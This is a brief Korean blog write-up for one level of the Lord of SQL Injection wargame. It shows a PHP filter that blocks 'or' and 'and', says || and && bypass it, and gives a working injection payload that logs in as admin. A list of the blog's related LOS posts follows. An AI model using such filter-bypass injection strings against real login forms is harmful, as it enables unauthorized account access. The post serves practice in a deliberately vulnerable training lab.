if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
or과 and를 막아놓았다.
이를 우회하는 방법으로는 ||와 &&을 대신해 사용할 수 있다.
?pw=%27 || id=%27admin%27%23
'Web > LOS' 카테고리의 다른 글
| [LOS] 문제 7. orge (0) | 2018.10.26 |
|---|---|
| [LOS] 문제 5. wolfman, 스페이스(빈칸) 우회 기법 이용 (0) | 2018.10.26 |
| [LOS] 문제 4. orc, 함수 이용하여 패스워드 알아내기 (0) | 2018.10.26 |
| [LOS] 문제 3. goblin, 따옴표 문자 필터링 우회 (1) | 2018.10.26 |
| [LOS] 문제 2. cobolt, 주석 URL 인코딩 (0) | 2018.10.26 |